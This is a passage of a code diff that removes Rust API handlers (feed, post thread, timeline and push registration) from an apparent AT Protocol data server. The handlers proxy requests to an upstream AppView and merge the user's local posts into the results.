let short_handle = if params.actor.ends_with(&suffix) {
|
||||
params.actor.strip_suffix(&suffix).unwrap_or(¶ms.actor)
|
||||
} else {
|
||||
¶ms.actor
|
||||
};
|
||||
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(did)) => did,
|
||||
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
|
||||
Err(e) => {
|
||||
warn!("Database error resolving actor handle: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
}
|
||||
};
|
||||
if actor_did != requester_did {
|
||||
return (StatusCode::OK, Json(feed_output)).into_response();
|
||||
}
|
||||
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
|
||||
Ok(r) => r,
|
||||
Err(e) => {
|
||||
warn!("Failed to get local records: {}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
if local_records.count == 0 {
|
||||
return (StatusCode::OK, Json(feed_output)).into_response();
|
||||
}
|
||||
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(h)) => h,
|
||||
Ok(None) => requester_did.clone(),
|
||||
Err(e) => {
|
||||
warn!("Database error fetching handle: {:?}", e);
|
||||
requester_did.clone()
|
||||
}
|
||||
};
|
||||
if let Some(ref local_profile) = local_records.profile {
|
||||
update_author_profile_in_feed(&mut feed_output.feed, &requester_did, local_profile);
|
||||
}
|
||||
let local_posts: Vec<_> = local_records
|
||||
.posts
|
||||
.iter()
|
||||
.map(|p| format_local_post(p, &requester_did, &handle, local_records.profile.as_ref()))
|
||||
.collect();
|
||||
insert_posts_into_feed(&mut feed_output.feed, local_posts);
|
||||
let lag = get_local_lag(&local_records);
|
||||
format_munged_response(feed_output, lag)
|
||||
}
|
||||
@@ -1,131 +0,0 @@
|
||||
use crate::api::ApiError;
|
||||
use crate::api::proxy_client::{
|
||||
MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Deserialize;
|
||||
use std::collections::HashMap;
|
||||
use tracing::{error, info};
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetFeedParams {
|
||||
pub feed: String,
|
||||
pub limit: Option<u32>,
|
||||
pub cursor: Option<String>,
|
||||
}
|
||||
|
||||
pub async fn get_feed(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetFeedParams>,
|
||||
) -> Response {
|
||||
let token = match crate::auth::extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
) {
|
||||
Some(t) => t,
|
||||
None => return ApiError::AuthenticationRequired.into_response(),
|
||||
};
|
||||
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
|
||||
Ok(user) => user,
|
||||
Err(e) => return ApiError::from(e).into_response(),
|
||||
};
|
||||
if let Err(e) = validate_at_uri(¶ms.feed) {
|
||||
return ApiError::InvalidRequest(format!("Invalid feed URI: {}", e)).into_response();
|
||||
}
|
||||
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.feed.getFeed").await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.feed.getFeed".to_string())
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
if let Err(e) = is_ssrf_safe(&resolved.url) {
|
||||
error!("SSRF check failed for appview URL: {}", e);
|
||||
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
|
||||
.into_response();
|
||||
}
|
||||
let limit = validate_limit(params.limit, 50, 100);
|
||||
let mut query_params = HashMap::new();
|
||||
query_params.insert("feed".to_string(), params.feed.clone());
|
||||
query_params.insert("limit".to_string(), limit.to_string());
|
||||
if let Some(cursor) = ¶ms.cursor {
|
||||
query_params.insert("cursor".to_string(), cursor.clone());
|
||||
}
|
||||
let target_url = format!("{}/xrpc/app.bsky.feed.getFeed", resolved.url);
|
||||
info!(target = %target_url, feed = %params.feed, "Proxying getFeed request");
|
||||
let client = proxy_client();
|
||||
let mut request_builder = client.get(&target_url).query(&query_params);
|
||||
if let Some(key_bytes) = auth_user.key_bytes.as_ref() {
|
||||
match crate::auth::create_service_token(
|
||||
&auth_user.did,
|
||||
&resolved.did,
|
||||
"app.bsky.feed.getFeed",
|
||||
key_bytes,
|
||||
) {
|
||||
Ok(service_token) => {
|
||||
request_builder =
|
||||
request_builder.header("Authorization", format!("Bearer {}", service_token));
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Failed to create service token for getFeed");
|
||||
return ApiError::InternalError.into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
match request_builder.send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
let content_length = resp.content_length().unwrap_or(0);
|
||||
if content_length > MAX_RESPONSE_SIZE {
|
||||
error!(
|
||||
content_length,
|
||||
max = MAX_RESPONSE_SIZE,
|
||||
"getFeed response too large"
|
||||
);
|
||||
return ApiError::UpstreamFailure.into_response();
|
||||
}
|
||||
let resp_headers = resp.headers().clone();
|
||||
let body = match resp.bytes().await {
|
||||
Ok(b) => {
|
||||
if b.len() as u64 > MAX_RESPONSE_SIZE {
|
||||
error!(len = b.len(), "getFeed response body exceeded limit");
|
||||
return ApiError::UpstreamFailure.into_response();
|
||||
}
|
||||
b
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Error reading getFeed response");
|
||||
return ApiError::UpstreamFailure.into_response();
|
||||
}
|
||||
};
|
||||
let mut response_builder = axum::response::Response::builder().status(status);
|
||||
if let Some(ct) = resp_headers.get("content-type") {
|
||||
response_builder = response_builder.header("content-type", ct);
|
||||
}
|
||||
match response_builder.body(axum::body::Body::from(body)) {
|
||||
Ok(r) => r,
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Error building getFeed response");
|
||||
ApiError::UpstreamFailure.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!(error = ?e, "Error proxying getFeed");
|
||||
if e.is_timeout() {
|
||||
ApiError::UpstreamTimeout.into_response()
|
||||
} else if e.is_connect() {
|
||||
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
|
||||
.into_response()
|
||||
} else {
|
||||
ApiError::UpstreamFailure.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,11 +0,0 @@
|
||||
mod actor_likes;
|
||||
mod author_feed;
|
||||
mod custom_feed;
|
||||
mod post_thread;
|
||||
mod timeline;
|
||||
|
||||
pub use actor_likes::get_actor_likes;
|
||||
pub use author_feed::get_author_feed;
|
||||
pub use custom_feed::get_feed;
|
||||
pub use post_thread::get_post_thread;
|
||||
pub use timeline::get_timeline;
|
||||
@@ -1,315 +0,0 @@
|
||||
use crate::api::read_after_write::{
|
||||
PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post,
|
||||
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::{Value, json};
|
||||
use std::collections::HashMap;
|
||||
use tracing::warn;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetPostThreadParams {
|
||||
pub uri: String,
|
||||
pub depth: Option<u32>,
|
||||
#[serde(rename = "parentHeight")]
|
||||
pub parent_height: Option<u32>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct ThreadViewPost {
|
||||
#[serde(rename = "$type")]
|
||||
pub thread_type: Option<String>,
|
||||
pub post: PostView,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub parent: Option<Box<ThreadNode>>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub replies: Option<Vec<ThreadNode>>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(untagged)]
|
||||
pub enum ThreadNode {
|
||||
Post(Box<ThreadViewPost>),
|
||||
NotFound(ThreadNotFound),
|
||||
Blocked(ThreadBlocked),
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct ThreadNotFound {
|
||||
#[serde(rename = "$type")]
|
||||
pub thread_type: String,
|
||||
pub uri: String,
|
||||
pub not_found: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct ThreadBlocked {
|
||||
#[serde(rename = "$type")]
|
||||
pub thread_type: String,
|
||||
pub uri: String,
|
||||
pub blocked: bool,
|
||||
pub author: Value,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct PostThreadOutput {
|
||||
pub thread: ThreadNode,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub threadgate: Option<Value>,
|
||||
}
|
||||
|
||||
const MAX_THREAD_DEPTH: usize = 10;
|
||||
|
||||
fn add_replies_to_thread(
|
||||
thread: &mut ThreadViewPost,
|
||||
local_posts: &[RecordDescript<PostRecord>],
|
||||
author_did: &str,
|
||||
author_handle: &str,
|
||||
depth: usize,
|
||||
) {
|
||||
if depth >= MAX_THREAD_DEPTH {
|
||||
return;
|
||||
}
|
||||
let thread_uri = &thread.post.uri;
|
||||
let replies: Vec<_> = local_posts
|
||||
.iter()
|
||||
.filter(|p| {
|
||||
p.record
|
||||
.reply
|
||||
.as_ref()
|
||||
.and_then(|r| r.get("parent"))
|
||||
.and_then(|parent| parent.get("uri"))
|
||||
.and_then(|u| u.as_str())
|
||||
== Some(thread_uri)
|
||||
})
|
||||
.map(|p| {
|
||||
let post_view = format_local_post(p, author_did, author_handle, None);
|
||||
ThreadNode::Post(Box::new(ThreadViewPost {
|
||||
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
|
||||
post: post_view,
|
||||
parent: None,
|
||||
replies: None,
|
||||
extra: HashMap::new(),
|
||||
}))
|
||||
})
|
||||
.collect();
|
||||
if !replies.is_empty() {
|
||||
match &mut thread.replies {
|
||||
Some(existing) => existing.extend(replies),
|
||||
None => thread.replies = Some(replies),
|
||||
}
|
||||
}
|
||||
if let Some(ref mut existing_replies) = thread.replies {
|
||||
for reply in existing_replies.iter_mut() {
|
||||
if let ThreadNode::Post(reply_thread) = reply {
|
||||
add_replies_to_thread(
|
||||
reply_thread,
|
||||
local_posts,
|
||||
author_did,
|
||||
author_handle,
|
||||
depth + 1,
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_post_thread(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetPostThreadParams>,
|
||||
) -> Response {
|
||||
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
|
||||
let auth_user = if let Some(h) = auth_header {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
|
||||
crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
} else {
|
||||
None
|
||||
};
|
||||
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
|
||||
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
|
||||
let mut query_params = HashMap::new();
|
||||
query_params.insert("uri".to_string(), params.uri.clone());
|
||||
if let Some(depth) = params.depth {
|
||||
query_params.insert("depth".to_string(), depth.to_string());
|
||||
}
|
||||
if let Some(parent_height) = params.parent_height {
|
||||
query_params.insert("parentHeight".to_string(), parent_height.to_string());
|
||||
}
|
||||
let proxy_result = match proxy_to_appview_via_registry(
|
||||
&state,
|
||||
"app.bsky.feed.getPostThread",
|
||||
&query_params,
|
||||
auth_did.as_deref().unwrap_or(""),
|
||||
auth_key_bytes.as_deref(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if proxy_result.status == StatusCode::NOT_FOUND {
|
||||
return handle_not_found(&state, ¶ms.uri, auth_did, &proxy_result.headers).await;
|
||||
}
|
||||
if !proxy_result.status.is_success() {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let rev = match extract_repo_rev(&proxy_result.headers) {
|
||||
Some(r) => r,
|
||||
None => return proxy_result.into_response(),
|
||||
};
|
||||
let mut thread_output: PostThreadOutput = match serde_json::from_slice(&proxy_result.body) {
|
||||
Ok(t) => t,
|
||||
Err(e) => {
|
||||
warn!("Failed to parse post thread response: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
let requester_did = match auth_did {
|
||||
Some(d) => d,
|
||||
None => return (StatusCode::OK, Json(thread_output)).into_response(),
|
||||
};
|
||||
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
|
||||
Ok(r) => r,
|
||||
Err(e) => {
|
||||
warn!("Failed to get local records: {}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
if local_records.posts.is_empty() {
|
||||
return (StatusCode::OK, Json(thread_output)).into_response();
|
||||
}
|
||||
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(h)) => h,
|
||||
Ok(None) => requester_did.clone(),
|
||||
Err(e) => {
|
||||
warn!("Database error fetching handle: {:?}", e);
|
||||
requester_did.clone()
|
||||
}
|
||||
};
|
||||
if let ThreadNode::Post(ref mut thread_post) = thread_output.thread {
|
||||
add_replies_to_thread(
|
||||
thread_post,
|
||||
&local_records.posts,
|
||||
&requester_did,
|
||||
&handle,
|
||||
0,
|
||||
);
|
||||
}
|
||||
let lag = get_local_lag(&local_records);
|
||||
format_munged_response(thread_output, lag)
|
||||
}
|
||||
|
||||
async fn handle_not_found(
|
||||
state: &AppState,
|
||||
uri: &str,
|
||||
auth_did: Option<String>,
|
||||
headers: &axum::http::HeaderMap,
|
||||
) -> Response {
|
||||
let rev = match extract_repo_rev(headers) {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let requester_did = match auth_did {
|
||||
Some(d) => d,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect();
|
||||
if uri_parts.len() != 3 {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
let post_did = uri_parts[0];
|
||||
if post_did != requester_did {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
let local_records = match get_records_since_rev(state, &requester_did, &rev).await {
|
||||
Ok(r) => r,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let local_post = local_records.posts.iter().find(|p| p.uri == uri);
|
||||
let local_post = match local_post {
|
||||
Some(p) => p,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Post not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(h)) => h,
|
||||
Ok(None) => requester_did.clone(),
|
||||
Err(e) => {
|
||||
warn!("Database error fetching handle: {:?}", e);
|
||||
requester_did.clone()
|
||||
}
|
||||
};
|
||||
let post_view = format_local_post(
|
||||
local_post,
|
||||
&requester_did,
|
||||
&handle,
|
||||
local_records.profile.as_ref(),
|
||||
);
|
||||
let thread = PostThreadOutput {
|
||||
thread: ThreadNode::Post(Box::new(ThreadViewPost {
|
||||
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
|
||||
post: post_view,
|
||||
parent: None,
|
||||
replies: None,
|
||||
extra: HashMap::new(),
|
||||
})),
|
||||
threadgate: None,
|
||||
};
|
||||
let lag = get_local_lag(&local_records);
|
||||
format_munged_response(thread, lag)
|
||||
}
|
||||
@@ -1,275 +0,0 @@
|
||||
use crate::api::read_after_write::{
|
||||
FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post,
|
||||
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
|
||||
proxy_to_appview_via_registry,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use jacquard_repo::storage::BlockStore;
|
||||
use serde::Deserialize;
|
||||
use serde_json::{Value, json};
|
||||
use std::collections::HashMap;
|
||||
use tracing::warn;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetTimelineParams {
|
||||
pub algorithm: Option<String>,
|
||||
pub limit: Option<u32>,
|
||||
pub cursor: Option<String>,
|
||||
}
|
||||
|
||||
pub async fn get_timeline(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetTimelineParams>,
|
||||
) -> Response {
|
||||
let token = match crate::auth::extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
) {
|
||||
Some(t) => t,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::UNAUTHORIZED,
|
||||
Json(json!({"error": "AuthenticationRequired"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
|
||||
Ok(user) => user,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::UNAUTHORIZED,
|
||||
Json(json!({"error": "AuthenticationFailed"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
if state.appview_registry.get_appview_for_method("app.bsky.feed.getTimeline").await.is_some() {
|
||||
return get_timeline_with_appview(
|
||||
&state,
|
||||
¶ms,
|
||||
&auth_user.did,
|
||||
auth_user.key_bytes.as_deref(),
|
||||
)
|
||||
.await;
|
||||
}
|
||||
get_timeline_local_only(&state, &auth_user.did).await
|
||||
}
|
||||
|
||||
async fn get_timeline_with_appview(
|
||||
state: &AppState,
|
||||
params: &GetTimelineParams,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
) -> Response {
|
||||
let mut query_params = HashMap::new();
|
||||
if let Some(algo) = ¶ms.algorithm {
|
||||
query_params.insert("algorithm".to_string(), algo.clone());
|
||||
}
|
||||
if let Some(limit) = params.limit {
|
||||
query_params.insert("limit".to_string(), limit.to_string());
|
||||
}
|
||||
if let Some(cursor) = ¶ms.cursor {
|
||||
query_params.insert("cursor".to_string(), cursor.clone());
|
||||
}
|
||||
let proxy_result = match proxy_to_appview_via_registry(
|
||||
state,
|
||||
"app.bsky.feed.getTimeline",
|
||||
&query_params,
|
||||
auth_did,
|
||||
auth_key_bytes,
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if !proxy_result.status.is_success() {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let rev = extract_repo_rev(&proxy_result.headers);
|
||||
if rev.is_none() {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let rev = rev.unwrap();
|
||||
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
|
||||
Ok(f) => f,
|
||||
Err(e) => {
|
||||
warn!("Failed to parse timeline response: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
let local_records = match get_records_since_rev(state, auth_did, &rev).await {
|
||||
Ok(r) => r,
|
||||
Err(e) => {
|
||||
warn!("Failed to get local records: {}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
if local_records.count == 0 {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", auth_did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(h)) => h,
|
||||
Ok(None) => auth_did.to_string(),
|
||||
Err(e) => {
|
||||
warn!("Database error fetching handle: {:?}", e);
|
||||
auth_did.to_string()
|
||||
}
|
||||
};
|
||||
let local_posts: Vec<_> = local_records
|
||||
.posts
|
||||
.iter()
|
||||
.map(|p| format_local_post(p, auth_did, &handle, local_records.profile.as_ref()))
|
||||
.collect();
|
||||
insert_posts_into_feed(&mut feed_output.feed, local_posts);
|
||||
let lag = get_local_lag(&local_records);
|
||||
format_munged_response(feed_output, lag)
|
||||
}
|
||||
|
||||
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
|
||||
let user_id: uuid::Uuid =
|
||||
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(id)) => id,
|
||||
Ok(None) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError", "message": "User not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(e) => {
|
||||
warn!("Database error fetching user: {:?}", e);
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError", "message": "Database error"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let follows_query = sqlx::query!(
|
||||
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
|
||||
user_id
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await;
|
||||
let follow_cids: Vec<String> = match follows_query {
|
||||
Ok(rows) => rows.iter().map(|r| r.record_cid.clone()).collect(),
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let mut followed_dids: Vec<String> = Vec::new();
|
||||
for cid_str in follow_cids {
|
||||
let cid = match cid_str.parse::<cid::Cid>() {
|
||||
Ok(c) => c,
|
||||
Err(_) => continue,
|
||||
};
|
||||
let block_bytes = match state.block_store.get(&cid).await {
|
||||
Ok(Some(b)) => b,
|
||||
_ => continue,
|
||||
};
|
||||
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
|
||||
Ok(v) => v,
|
||||
Err(_) => continue,
|
||||
};
|
||||
if let Some(subject) = record.get("subject").and_then(|s| s.as_str()) {
|
||||
followed_dids.push(subject.to_string());
|
||||
}
|
||||
}
|
||||
if followed_dids.is_empty() {
|
||||
return (
|
||||
StatusCode::OK,
|
||||
Json(FeedOutput {
|
||||
feed: vec![],
|
||||
cursor: None,
|
||||
}),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
let posts_result = sqlx::query!(
|
||||
"SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle
|
||||
FROM records r
|
||||
JOIN repos rp ON r.repo_id = rp.user_id
|
||||
JOIN users u ON rp.user_id = u.id
|
||||
WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'
|
||||
ORDER BY r.created_at DESC
|
||||
LIMIT 50",
|
||||
&followed_dids
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await;
|
||||
let posts = match posts_result {
|
||||
Ok(rows) => rows,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let mut feed: Vec<FeedViewPost> = Vec::new();
|
||||
for row in posts {
|
||||
let record_cid: String = row.record_cid;
|
||||
let rkey: String = row.rkey;
|
||||
let created_at: chrono::DateTime<chrono::Utc> = row.created_at;
|
||||
let author_did: String = row.did;
|
||||
let author_handle: String = row.handle;
|
||||
let cid = match record_cid.parse::<cid::Cid>() {
|
||||
Ok(c) => c,
|
||||
Err(_) => continue,
|
||||
};
|
||||
let block_bytes = match state.block_store.get(&cid).await {
|
||||
Ok(Some(b)) => b,
|
||||
_ => continue,
|
||||
};
|
||||
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
|
||||
Ok(v) => v,
|
||||
Err(_) => continue,
|
||||
};
|
||||
let uri = format!("at://{}/app.bsky.feed.post/{}", author_did, rkey);
|
||||
feed.push(FeedViewPost {
|
||||
post: PostView {
|
||||
uri,
|
||||
cid: record_cid,
|
||||
author: crate::api::read_after_write::AuthorView {
|
||||
did: author_did,
|
||||
handle: author_handle,
|
||||
display_name: None,
|
||||
avatar: None,
|
||||
extra: HashMap::new(),
|
||||
},
|
||||
record,
|
||||
indexed_at: created_at.to_rfc3339(),
|
||||
embed: None,
|
||||
reply_count: 0,
|
||||
repost_count: 0,
|
||||
like_count: 0,
|
||||
quote_count: 0,
|
||||
extra: HashMap::new(),
|
||||
},
|
||||
reply: None,
|
||||
reason: None,
|
||||
feed_context: None,
|
||||
extra: HashMap::new(),
|
||||
});
|
||||
}
|
||||
(StatusCode::OK, Json(FeedOutput { feed, cursor: None })).into_response()
|
||||
}
|
||||
@@ -1,14 +1,11 @@
|
||||
pub mod actor;
|
||||
pub mod admin;
|
||||
pub mod error;
|
||||
pub mod feed;
|
||||
pub mod identity;
|
||||
pub mod moderation;
|
||||
pub mod notification;
|
||||
pub mod notification_prefs;
|
||||
pub mod proxy;
|
||||
pub mod proxy_client;
|
||||
pub mod read_after_write;
|
||||
pub mod repo;
|
||||
pub mod server;
|
||||
pub mod temp;
|
||||
|
||||
@@ -1,3 +0,0 @@
|
||||
mod register_push;
|
||||
|
||||
pub use register_push::register_push;
|
||||
@@ -1,153 +0,0 @@
|
||||
use crate::api::ApiError;
|
||||
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::State,
|
||||
http::{HeaderMap, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Deserialize;
|
||||
use serde_json::json;
|
||||
use tracing::{error, info};
|
||||
|
||||
#[derive(Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct RegisterPushInput {
|
||||
pub service_did: String,
|
||||
pub token: String,
|
||||
pub platform: String,
|
||||
pub app_id: String,
|
||||
}
|
||||
|
||||
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
|
||||
|
||||
pub async fn register_push(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Json(input): Json<RegisterPushInput>,
|
||||
) -> Response {
|
||||
let token = match crate::auth::extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
) {
|
||||
Some(t) => t,
|
||||
None => return ApiError::AuthenticationRequired.into_response(),
|
||||
};
|
||||
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
|
||||
Ok(user) => user,
|
||||
Err(e) => return ApiError::from(e).into_response(),
|
||||
};
|
||||
if let Err(e) = validate_did(&input.service_did) {
|
||||
return ApiError::InvalidRequest(format!("Invalid serviceDid: {}", e)).into_response();
|
||||
}
|
||||
if input.token.is_empty() || input.token.len() > 4096 {
|
||||
return ApiError::InvalidRequest("Invalid push token".to_string()).into_response();
|
||||
}
|
||||
if !VALID_PLATFORMS.contains(&input.platform.as_str()) {
|
||||
return ApiError::InvalidRequest(format!(
|
||||
"Invalid platform. Must be one of: {}",
|
||||
VALID_PLATFORMS.join(", ")
|
||||
))
|
||||
.into_response();
|
||||
}
|
||||
if input.app_id.is_empty() || input.app_id.len() > 256 {
|
||||
return ApiError::InvalidRequest("Invalid appId".to_string()).into_response();
|
||||
}
|
||||
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.notification.registerPush").await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.notification.registerPush".to_string())
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
if let Err(e) = is_ssrf_safe(&resolved.url) {
|
||||
error!("SSRF check failed for appview URL: {}", e);
|
||||
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
|
||||
.into_response();
|
||||
}
|
||||
